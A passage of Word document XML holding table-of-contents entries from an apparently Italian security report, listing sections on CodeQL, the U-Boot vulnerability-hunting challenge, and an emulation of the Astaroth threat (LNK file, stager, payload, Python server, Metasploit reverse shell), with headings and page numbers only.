                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165792 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A1821F7" w14:textId="0FD75E96"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93" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 CodeQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165793 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7ADBB94C" w14:textId="69CF129E"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794" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4 U-boot Challenge</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165794 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A609E21" w14:textId="4BB711E4" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165795" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.1 Trovare tutte le funzioni chiamate memcpy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="479F4C34" w14:textId="5F3A15A1" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165796" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.2 Trovare tutte le funzioni nominatememcpy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="453B362A" w14:textId="77E26D4B" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165797" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3 Trovare tutte ntoh*le macro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B99C9D8" w14:textId="09A7FC40" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165798" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.4 Trova tutte le chiamate a memcpy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25E11C1E" w14:textId="15555AFB" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165799" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.5 Trova tutte le invocazioni delle macro ntoh*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48006AAA" w14:textId="5CD4BFD5" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165800" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.6 Trovare le espressioni di primo livello in cui si espandono queste invocazioni di macro</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5308C556" w14:textId="7C7D101F" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165801" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.7 scrivere una classe CodeQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12875C52" w14:textId="55B43965" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165802" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.8 Analisi del flusso di dati e tracciamento delle contaminazioni</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DED74BA" w14:textId="70BA1072" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165803" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cyber Threat – Astaroth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49A3F396" w14:textId="7F6AE788"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04" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Fase uno, creazione “clikme.lnk”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31C4B09D" w14:textId="4580BCF1"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05" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Fase due, stager.cmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61B838D2" w14:textId="7904F219"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06" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4 Fase tre, generazione payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7368BC8F" w14:textId="3FE0345B"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07" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5 Fase quattro, configurazione del server python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1416A5D9" w14:textId="4EB14C8D"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08" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.6 Fase cinque, Metasploit reverse shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43E53EE3" w14:textId="4A14F4DF"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09" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.7 Fase cinque, Exploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165809 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CAA6820" w14:textId="6F34C787" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165810" w:history="1">
